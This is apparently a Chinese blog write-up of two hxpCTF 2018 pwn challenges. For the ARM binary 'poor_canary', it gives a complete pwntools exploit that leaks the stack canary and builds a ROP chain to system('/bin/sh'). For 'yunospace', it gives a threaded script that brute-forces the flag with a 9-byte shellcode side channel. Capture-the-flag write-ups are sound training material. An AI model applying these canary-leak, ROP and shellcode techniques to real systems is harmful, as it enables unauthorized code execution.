骑麦兜看落日

[WriteUp]hxpCTF

字数统计: 856阅读时长: 4 min
2018/12/07 Share

PWN


poor_canary


题目信息

Please hack.


Download:

poor_canary-416f0aa7555d7ca8.tar.xz

Connection:

nc 116.203.30.62 18113


程序分析

1
2
3
4
5
6
7
8
$ file canary 
canary: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=3599326b9bf146191588a1e13fb3db905951de07, not stripped
$ checksec canary
Arch: arm-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x10000)

解题过程

题目不难,直接leak出canary然后构造ROP就好了,需要注意的是使用的arm架构


EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *

context(log_level = 'debug', arch = 'arm', os = 'linux', terminal = ['tmux','splitw','-h'])

exe = './canary'
elf = ELF(exe)

#io = process(['qemu-arm','-g','2333','./canary'])
io = remote('116.203.30.62',18113)
def gdb(script=''):
attach(io,gdbscript=script)

io.recvuntil('> ')
io.send('A'*0x29)
io.recvuntil('A'*0x29)
canary = u32(io.recv(3).rjust(4,'\x00'))

bin_sh_addr = 0x00071eb0
system_addr = 0x00016DA8
p_r0_r4_pc_addr = 0x00026b7c

payload = 'A'*0x28
payload += p32(canary)
payload += p32(0)
payload += p32(0)
payload += p32(0)
payload += p32(p_r0_r4_pc_addr)
payload += p32(bin_sh_addr)
payload += p32(0)
payload += p32(system_addr)

io.send(payload)
pause()
io.recvuntil('A'*0x28)
io.sendline()

io.interactive()

yunospace


题目信息

How does free code execution sound to you? If only the whole thing wasn’t that narrow.


Download:

yunospace-72eaeebb6cbb17a4.tar.xz

Connection:

nc 195.201.127.119 8664


程序分析

1
2
3
4
5
6
7
8
$ file yunospace 
yunospace: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0726aed5ad0018b0f1f538a6d5fa6a10e27b1aba, stripped
$ checksec yunospace
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled

解题过程

这道题和之前护网杯的一道题有点类似,最近这类题很多,暂且把他们称作shellcode极限利用类题型吧

先回顾护网杯的题,那道题通过mmap映射了两段内存,一段作为code段,一段作为stack段,只保留rsprip的值,解题思路是当mmap映射的两块内存地址非法时会重新映射到两块合法的内存中,且他们之间的距离固定,这样调用syscall中的read函数,从stack段溢出到code段,执行写入的shellcode,只需要6个字节

开始这道题我也想用这个思路,但是后来发现两个问题

  1. stack段不可执行,code段不可写
  2. 随机读取的地址经过运算后必定合法

这样的话上述方法就不能用了,重新分析文件,发现另外两个点

  1. 可以读入9个字节
  2. 读入的9个字节之后是flag中的一个字节(见.py文件)

那么思路应该不是执行execve()而是逐位爆破,开始想直接调用syscall中的write函数,但是9个字节不能实现,这里我用类似于web中sql盲测的思路,通过与flag字节比较返回不同的状态来爆破flag

汇编代码如下

1
2
3
cmp byte ptr [rip+2],flag_byte
loop:
je loop

当判断不正确时返回EOF,否则会无限循环,以此来判断是否为flag


EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/env python

import threading
from pwn import *
context(log_level = 'debug',arch = "amd64",os = "linux")

exe = './yunospace'
ip = '195.201.127.119'
port = 8664
elf = ELF(exe)

def gdb(script = ''):
attach(io,gdbscript = script)

def count(idx):
io = remote(ip, port)
io.recvuntil('> Welcome. Which byte should we prepare for you today?\n')
io.sendline(str(idx))
result = io.recv()
io.close()
if result == "> That's beyond my capabilities. Goodbye.\n":
return True
else:
return False

def pwn(flag,idx):
for c in range(0x20,0x80):

payload = asm('''
cmp byte ptr [rip+2],'''+hex(c)+'''
loop:
je loop''',arch="amd64")

io = remote(ip, port)
io.recvuntil('> Welcome. Which byte should we prepare for you today?\n')
io.sendline(str(idx))
io.recvuntil('> Ok. Now your shellcode, please.\n')
io.send(payload)
try:
io.recv(timeout=3)
flag[idx] = chr(c)
break
except:
continue
finally:
io.close()

counts = 0

while True:
boolean = count(counts)
if boolean:
break
counts += 1

t=[]
flag = [[]]*counts

for i in range(counts):
t.append(threading.Thread(target=pwn,args=(flag,i,)))
t[i].start()

for i in range(counts):
t[i].join()

print(''.join(flag))

相关资料

CATALOG
  1. 1. PWN
    1. 1.1. poor_canary
      1. 1.1.1. 题目信息
  2. 2. Download:
  3. 3. Connection:
    1. 3.0.1. 程序分析
    2. 3.0.2. 解题过程
    3. 3.0.3. EXP
  4. 3.1. yunospace
    1. 3.1.1. 题目信息
  • 4. Download:
  • 5. Connection:
    1. 5.0.1. 程序分析
    2. 5.0.2. 解题过程
    3. 5.0.3. EXP
    4. 5.0.4. 相关资料